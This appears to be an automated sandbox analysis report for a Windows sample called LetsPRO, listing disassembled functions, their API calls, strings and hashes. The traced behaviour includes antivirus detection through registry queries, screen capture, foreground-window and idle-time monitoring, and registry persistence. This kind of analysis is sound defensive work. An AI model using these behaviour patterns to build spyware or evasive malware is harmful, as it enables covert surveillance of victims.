                                        control_flow_graph 778 3f362b6-3f362bd 779 3f362c0-3f36363 call 3f46770 wsprintfW RegOpenKeyExW 778->779 782 3f363e9-3f363ff 779->782 783 3f36369-3f36376 call 3f46770 779->783 786 3f36402-3f36404 782->786 785 3f3637b-3f363ba RegQueryValueExW 783->785 787 3f363dc-3f363e3 RegCloseKey 785->787 788 3f363bc-3f363da lstrcatW * 2 785->788 786->779 789 3f3640a-3f36418 786->789 787->782 788->787 790 3f36422-3f3642f lstrlenW 789->790 791 3f3641a-3f3641f 789->791 792 3f36441-3f36450 790->792 793 3f36431-3f3643b lstrcatW 790->793 791->790 794 3f36452-3f36457 792->794 795 3f3645a-3f3647a call 3f3f00a 792->795 793->792 794->795
                                        APIs
                                        • _memset.LIBCMT ref: 03F362CE
                                        • wsprintfW.USER32 ref: 03F36336
                                        • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 03F3635F
                                        • _memset.LIBCMT ref: 03F36376
                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 03F363B2
                                        • lstrcatW.KERNEL32(03F61F10,?), ref: 03F363CE
                                        • lstrcatW.KERNEL32(03F61F10,03F5535C), ref: 03F363DA
                                        • RegCloseKey.ADVAPI32(00000000), ref: 03F363E3
                                        • lstrlenW.KERNEL32(03F61F10,?,1A93E2E0,00000AD4,00000000,75A773E0), ref: 03F36427
                                        • lstrcatW.KERNEL32(03F61F10,03F553D4), ref: 03F3643B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: lstrcat$_memset$CloseOpenQueryValuelstrlenwsprintf
                                        • String ID: CLSID\{%.8X-%.4X-%.4X-%.2X%.2X-%.2X%.2X%.2X%.2X%.2X%.2X}$Windows Defender IOfficeAntiVirus implementation
                                        • API String ID: 1671694837-1583895642
                                        • Opcode ID: ed97aea7e758568ae0504cb0f6c6f54f775ab2b2bc080933109c013d033c79b5
                                        • Instruction ID: f48d14cabe4503200de95d0a381c41eb14f0bfe6fa7ff74e9a188655a0101ea3
                                        • Opcode Fuzzy Hash: ed97aea7e758568ae0504cb0f6c6f54f775ab2b2bc080933109c013d033c79b5
                                        • Instruction Fuzzy Hash: C74172F1A002686EDB24DB94CC91FEEB7B8AB49705F0441C8F74DA7191DA74AA80CF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3C060 Relevance: 19.7, APIs: 13, Instructions: 179memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • GlobalAlloc.KERNEL32(00000002,?,1A93E2E0,?,00000000,?), ref: 03F3C09E
                                        • GlobalLock.KERNEL32(00000000), ref: 03F3C0AA
                                        • GlobalUnlock.KERNEL32(00000000), ref: 03F3C0BF
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03F3C0D5
                                        • EnterCriticalSection.KERNEL32(03F5FB64), ref: 03F3C113
                                        • LeaveCriticalSection.KERNEL32(03F5FB64), ref: 03F3C124
                                          • Part of subcall function 03F39DE0: GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 03F39E04
                                          • Part of subcall function 03F39DE0: GdipDisposeImage.GDIPLUS(?), ref: 03F39E18
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 03F3C14C
                                          • Part of subcall function 03F3A460: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03F3A48D
                                          • Part of subcall function 03F3A460: _free.LIBCMT ref: 03F3A503
                                        • GetHGlobalFromStream.OLE32(?,?), ref: 03F3C16D
                                        • GlobalLock.KERNEL32(?), ref: 03F3C177
                                        • GlobalFree.KERNEL32(00000000), ref: 03F3C18F
                                          • Part of subcall function 03F39BA0: DeleteObject.GDI32(?), ref: 03F39BD2
                                          • Part of subcall function 03F39BA0: EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BE3
                                          • Part of subcall function 03F39BA0: EnterCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39BF8
                                          • Part of subcall function 03F39BA0: GdiplusShutdown.GDIPLUS(00000000,?,?,?,03F39B7B), ref: 03F39C04
                                          • Part of subcall function 03F39BA0: LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C15
                                          • Part of subcall function 03F39BA0: LeaveCriticalSection.KERNEL32(03F5FB64,?,?,?,03F39B7B), ref: 03F39C1C
                                        • GlobalSize.KERNEL32(00000000), ref: 03F3C1A5
                                        • GlobalUnlock.KERNEL32(?,?), ref: 03F3C221
                                        • GlobalFree.KERNEL32(00000000), ref: 03F3C249
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Global$CriticalSection$Stream$CreateEnterGdipLeave$FreeFromImageLockSizeUnlock$AllocBitmapDeleteDisposeEncodersGdiplusObjectShutdown_free
                                        • String ID:
                                        • API String ID: 1483550337-0
                                        • Opcode ID: f0129592601724b0203116e2e765313af7d67884a19683d90bccd563a1c2585a
                                        • Instruction ID: d137d94f97a284ec727f693c550a5b36fef2a0766ac8d191759ac2fc6ad8772e
                                        • Opcode Fuzzy Hash: f0129592601724b0203116e2e765313af7d67884a19683d90bccd563a1c2585a
                                        • Instruction Fuzzy Hash: 2E6127B6D00319EFDB10EFA8D8949AEBBB8FF49710F10452AE915AB341DB70A905CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • _memset.LIBCMT ref: 03F364C2
                                        • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 03F364E2
                                        • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 03F36524
                                        • _memset.LIBCMT ref: 03F36560
                                        • _memset.LIBCMT ref: 03F3658E
                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75A773E0), ref: 03F365BA
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A773E0), ref: 03F365C3
                                        • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75A773E0), ref: 03F365D5
                                        • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75A773E0), ref: 03F36625
                                        • lstrlenW.KERNEL32(?), ref: 03F36635
                                        Strings
                                        • Software\Tencent\Plugin\VAS, xrefs: 03F364D8
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                        • String ID: Software\Tencent\Plugin\VAS
                                        • API String ID: 2921034913-3343197220
                                        • Opcode ID: 01f4123ba94e66045e2b16d5bbdcb45cc132cf64e142e72ee2389d2ba863932e
                                        • Instruction ID: b565caf2ff002a2ac45deaf6b777b83ee7f7b66d7236138be17df99b2a56efb1
                                        • Opcode Fuzzy Hash: 01f4123ba94e66045e2b16d5bbdcb45cc132cf64e142e72ee2389d2ba863932e
                                        • Instruction Fuzzy Hash: 9C4196F6E40319BBD724DB54CD85FEAB77CDB45700F004599E709FB041EA70AA858BA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3A460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 03F3A48D
                                        • _malloc.LIBCMT ref: 03F3A4D1
                                        • _free.LIBCMT ref: 03F3A503
                                        • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 03F3A522
                                        • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 03F3A594
                                        • GdipDisposeImage.GDIPLUS(00000000), ref: 03F3A59F
                                        • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 03F3A5C5
                                        • GdipDisposeImage.GDIPLUS(00000000), ref: 03F3A5DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                        • String ID: &
                                        • API String ID: 2794124522-3042966939
                                        • Opcode ID: a08e66f958375e18fbeead37103dfcf7643beedc79a391e108052882001eb2a3
                                        • Instruction ID: b3dd4f5f852ba04f41cb1a02b966bce431a700816cf8fec46e76079efd67deb0
                                        • Opcode Fuzzy Hash: a08e66f958375e18fbeead37103dfcf7643beedc79a391e108052882001eb2a3
                                        • Instruction Fuzzy Hash: 615165B6D00219AFDF04DFA5D844EEEB7B8EF49700F048269E905BB250E774A945CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F52B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 025F5382
                                        • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 025F5392
                                        • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0260C6E0,000012A0), ref: 025F53B0
                                        • RegCloseKey.ADVAPI32(?), ref: 025F53BB
                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 025F540F
                                        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 025F541B
                                        • Sleep.KERNEL32(00000BB8), ref: 025F5434
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                        • String ID: IpDates_info$SOFTWARE
                                        • API String ID: 864241144-2243437601
                                        • Opcode ID: f427f0056ce6c60db36fcc57d1d6b3758b5e5e24fa2710f4e9ceef8eec8103f9
                                        • Instruction ID: fa0febde18390d86305530d2a384e1aa8f97fad7395f040f0870353e8425ee06
                                        • Opcode Fuzzy Hash: f427f0056ce6c60db36fcc57d1d6b3758b5e5e24fa2710f4e9ceef8eec8103f9
                                        • Instruction Fuzzy Hash: 4F4129316942819BD3528F388889F7F7FA5BB45304FD81949E782D61C2F7B0E842D79A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F52D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 025F5382
                                        • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 025F5392
                                        • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,0260C6E0,000012A0), ref: 025F53B0
                                        • RegCloseKey.ADVAPI32(?), ref: 025F53BB
                                        • OpenProcess.KERNEL32(00000400,00000000,?), ref: 025F540F
                                        • GetExitCodeProcess.KERNEL32(00000000,?), ref: 025F541B
                                        • Sleep.KERNEL32(00000BB8), ref: 025F5434
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                        • String ID: IpDates_info$SOFTWARE
                                        • API String ID: 864241144-2243437601
                                        • Opcode ID: a725eaf4e8d3ca759e193c804b6c161ad4a759a816cedef46f7f01e9d5725155
                                        • Instruction ID: 439c99d969a6f44ddc82f41d33703acf9bad45b8b81c3d6d129d336ff15158ca
                                        • Opcode Fuzzy Hash: a725eaf4e8d3ca759e193c804b6c161ad4a759a816cedef46f7f01e9d5725155
                                        • Instruction Fuzzy Hash: E131C5306942819BD7528F388888F7F7FE5BB45304FD81848F3869A182E7A0E946DB59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3CA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,03F512F8,1A93E2E0,00000001,00000000,00000000), ref: 03F3CAB1
                                        • RegQueryInfoKeyW.ADVAPI32(03F512F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 03F3CAE0
                                        • _memset.LIBCMT ref: 03F3CB44
                                        • _memset.LIBCMT ref: 03F3CB53
                                        • RegEnumValueW.KERNEL32(03F512F8,?,00000000,?,00000000,?,00000000,?), ref: 03F3CB72
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                          • Part of subcall function 03F3F707: std::exception::exception.LIBCMT ref: 03F3F756
                                          • Part of subcall function 03F3F707: std::exception::exception.LIBCMT ref: 03F3F770
                                          • Part of subcall function 03F3F707: __CxxThrowException@8.LIBCMT ref: 03F3F781
                                        • RegCloseKey.ADVAPI32(03F512F8,?,?,?,?,?,?,?,?,?,?,?,00000000,03F512F8,000000FF), ref: 03F3CC83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                        • String ID: Console\0
                                        • API String ID: 1348767993-1253790388
                                        • Opcode ID: 32386ea16538fcc9578888da7adb01dfbba68c1f855f3809c0a0dd4955958700
                                        • Instruction ID: c432f64074794842a0d9593eaf9e563a11676473fa7bddeae6c88e72fab4b28d
                                        • Opcode Fuzzy Hash: 32386ea16538fcc9578888da7adb01dfbba68c1f855f3809c0a0dd4955958700
                                        • Instruction Fuzzy Hash: DE611DB5D01219AFDB04DFA8DC80AAEB7B8FF49310F14466AE915EB245D774A901CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F6110 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 172sleepsynchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 025F7654: __fassign.LIBCMT ref: 025F764A
                                        • Sleep.KERNEL32(00000000), ref: 025F614C
                                          • Part of subcall function 025F6FF7: _malloc.LIBCMT ref: 025F7011
                                        • Sleep.KERNEL32(00000000), ref: 025F62B1
                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 025F62FD
                                          • Part of subcall function 025F2C50: WSAStartup.WS2_32(00000202,?), ref: 025F2CAF
                                          • Part of subcall function 025F2C50: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 025F2CBA
                                          • Part of subcall function 025F2C50: InterlockedExchange.KERNEL32(00000018,00000000), ref: 025F2CC8
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 025F6347
                                        • CloseHandle.KERNEL32(?), ref: 025F6365
                                        • CloseHandle.KERNEL32(?), ref: 025F6372
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CloseCreateEventHandleSleep$ExchangeInterlockedObjectSingleStartupWait__fassign_malloc
                                        • String ID: 127.0.0.1
                                        • API String ID: 3083163006-3619153832
                                        • Opcode ID: 7bb8d5981c97c5beb9d1da5caad4220c2c963d59c2fa20f8e055759ef3c351f8
                                        • Instruction ID: 7519875bcd92d78881b7a6af908fd9c194c8f7904af3d131f44b139b1249eac1
                                        • Opcode Fuzzy Hash: 7bb8d5981c97c5beb9d1da5caad4220c2c963d59c2fa20f8e055759ef3c351f8
                                        • Instruction Fuzzy Hash: 9551F9B0E81246AFEB40EFA4DCC1D5FBB75BF48304F045619E212A72C4CB705554EB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3BB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 03F3F707: _malloc.LIBCMT ref: 03F3F721
                                        • _memset.LIBCMT ref: 03F3BB21
                                        • GetLastInputInfo.USER32(?), ref: 03F3BB37
                                        • GetTickCount.KERNEL32 ref: 03F3BB3D
                                        • wsprintfW.USER32 ref: 03F3BB66
                                        • GetForegroundWindow.USER32 ref: 03F3BB6F
                                        • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 03F3BB83
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                        • String ID: %d min
                                        • API String ID: 3754759880-1947832151
                                        • Opcode ID: 0bbbc3f547a19564f366ebf222fdafdf892e44d914239a05d21c6b2ca435d974
                                        • Instruction ID: d880506ae1bad01d856896beef8294dcf9cac553b325fae54b576bdeffef935b
                                        • Opcode Fuzzy Hash: 0bbbc3f547a19564f366ebf222fdafdf892e44d914239a05d21c6b2ca435d974
                                        • Instruction Fuzzy Hash: 4D41A0B5D00218AFCB10EFA4DC99E9FBBB8EF45700F088565E9099B345DA749A04CBE1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F36D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 03F36DD9
                                        • RegOpenKeyExW.KERNEL32(80000001,03F55164,00000000,00020019,75A773E0), ref: 03F36DFC
                                        • RegQueryValueExW.KERNEL32(75A773E0,GROUP,00000000,00000001,?,00000208), ref: 03F36E4A
                                        • lstrcmpW.KERNEL32(?,03F55148), ref: 03F36E60
                                        • lstrcpyW.KERNEL32(03F356EA,?), ref: 03F36E72
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                        • String ID: GROUP
                                        • API String ID: 2102619503-2593425013
                                        • Opcode ID: b3f5ce213ee71b30c8a75c1f5edc519f5effc0662ff2ac9f6f7bd6d46556b5b3
                                        • Instruction ID: 3a6ab19321c3cfc31fb4a633144a97fa991a63ff6f50d9e7e2fa9e920903d46d
                                        • Opcode Fuzzy Hash: b3f5ce213ee71b30c8a75c1f5edc519f5effc0662ff2ac9f6f7bd6d46556b5b3
                                        • Instruction Fuzzy Hash: 84317471901319BBDB20DF90DD89B9EB7B8FB09710F104699E519E7280DB78AA84CF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F72FB Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 025F7320
                                        • __calloc_crt.LIBCMT ref: 025F732C
                                        • __getptd.LIBCMT ref: 025F7339
                                        • CreateThread.KERNEL32(?,?,025F7296,00000000,?,?), ref: 025F7370
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 025F737A
                                        • _free.LIBCMT ref: 025F7383
                                        • __dosmaperr.LIBCMT ref: 025F738E
                                          • Part of subcall function 025F71ED: __getptd_noexit.LIBCMT ref: 025F71ED
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 155776804-0
                                        • Opcode ID: 3d4fa6a56ce01f6d1864ea74fdc12f25bbb917e1db63e0d6c5d7b8b91826deaf
                                        • Instruction ID: ef7311fcb00edacb56ee4790ada1fa0e85df4c9a6e4dfab46bca02b7473c5985
                                        • Opcode Fuzzy Hash: 3d4fa6a56ce01f6d1864ea74fdc12f25bbb917e1db63e0d6c5d7b8b91826deaf
                                        • Instruction Fuzzy Hash: 6C11C632145746AFDB50AFA5DC40E5F7BABFF88764F110429FB1586180DB71D4008EA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3FA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 03F3FA4E
                                        • __calloc_crt.LIBCMT ref: 03F3FA5A
                                        • __getptd.LIBCMT ref: 03F3FA67
                                        • CreateThread.KERNEL32(?,?,03F3F9C4,00000000,?,?), ref: 03F3FA9E
                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 03F3FAA8
                                        • _free.LIBCMT ref: 03F3FAB1
                                        • __dosmaperr.LIBCMT ref: 03F3FABC
                                          • Part of subcall function 03F3F91B: __getptd_noexit.LIBCMT ref: 03F3F91B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                        • String ID:
                                        • API String ID: 155776804-0
                                        • Opcode ID: 81ded7ca751bb3dcb2436edb5c1c73c6128ca4e79bf354af14549eb1c792285e
                                        • Instruction ID: c2be8c062340d1ad29d039f9557e2cc33cff3bd540ee7ed0ff164a9070591b46
                                        • Opcode Fuzzy Hash: 81ded7ca751bb3dcb2436edb5c1c73c6128ca4e79bf354af14549eb1c792285e
                                        • Instruction Fuzzy Hash: 7C11A13AA0570BBFDB11FFA5EC40E9B7BE8DF06A60B14442AF915CA190DB71D8118A61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F37410 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03F37523), ref: 03F3743D
                                        • GetProcAddress.KERNEL32(00000000), ref: 03F37444
                                        • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03F37523), ref: 03F37452
                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03F37523), ref: 03F3745A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3273259930.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 03F30000, based on PE: true
                                        • Associated: 00000004.00000002.3273259930.0000000003F64000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_3f30000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: InfoSystem$AddressHandleModuleNativeProc
                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                        • API String ID: 3433367815-192647395
                                        • Opcode ID: bd076a9ba35895deb5ddc23c03da28c42e2be70e9c3d94db03d92704c842ecb2
                                        • Instruction ID: a109c09dd603c9395d82d83faf4c7d3913346dc9255bf5dcb679ab151312ce90
                                        • Opcode Fuzzy Hash: bd076a9ba35895deb5ddc23c03da28c42e2be70e9c3d94db03d92704c842ecb2
                                        • Instruction Fuzzy Hash: 42012CB0D0020D9FCB50EFB4D944AAEBBF5EB09200F5445A9EA59E3240E6359A00CB61
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 025F7296 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 025F729C
                                          • Part of subcall function 025F97C0: TlsGetValue.KERNEL32(00000000,025F9919,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253,00000000,00000000), ref: 025F97C9
                                          • Part of subcall function 025F97C0: RtlDecodePointer.NTDLL ref: 025F97DB
                                          • Part of subcall function 025F97C0: TlsSetValue.KERNEL32(00000000,?,025FA030,00000000,00000001,00000000,?,025FC1C3,00000018,02607BF0,0000000C,025FC253,00000000,00000000,?,025F9A26), ref: 025F97EA
                                        • ___fls_getvalue@4.LIBCMT ref: 025F72A7
                                          • Part of subcall function 025F97A0: TlsGetValue.KERNEL32(?,?,025F72AC,00000000), ref: 025F97AE
                                        • ___fls_setvalue@8.LIBCMT ref: 025F72BA
                                          • Part of subcall function 025F97F4: RtlDecodePointer.NTDLL(?), ref: 025F9805
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 025F72C3
                                        • RtlExitUserThread.NTDLL(00000000), ref: 025F72CA
                                        • GetCurrentThreadId.KERNEL32 ref: 025F72D0
                                        • __freefls@4.LIBCMT ref: 025F72F0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.3270208033.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 025F0000, based on PE: true
                                        • Associated: 00000004.00000002.3270208033.000000000260F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_25f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Value$DecodePointerThread$CurrentErrorExitLastUser___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                        • String ID:
                                        • API String ID: 2876972746-0
                                        • Opcode ID: 3a72f8a226d4137a62f9d8dfdce620f2b10f8e3f0ba51029bec0760b91143351
                                        • Instruction ID: f8612b034204385adee04cf37d3a36e5a828e2bd12c969569642b660206917e5
                                        • Opcode Fuzzy Hash: 3a72f8a226d4137a62f9d8dfdce620f2b10f8e3f0ba51029bec0760b91143351
                                        • Instruction Fuzzy Hash: 2AF01274501B42ABC744BF71C548E4F7BABBECA3047108854EB0687215DB35D942CE99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 03F3F9C4 Relevance: 10.5, APIs: 7, Instructions: 34threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 03F3F9CA
                                          • Part of subcall function 03F43CA0: TlsGetValue.KERNEL32(00000000,03F43DF9,?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000), ref: 03F43CA9
                                          • Part of subcall function 03F43CA0: DecodePointer.KERNEL32(?,03F44500,00000000,00000001,00000000,?,03F48DE6,00000018,03F56448,0000000C,03F48E76,00000000,00000000,?,03F43F06,0000000D), ref: 03F43CBB
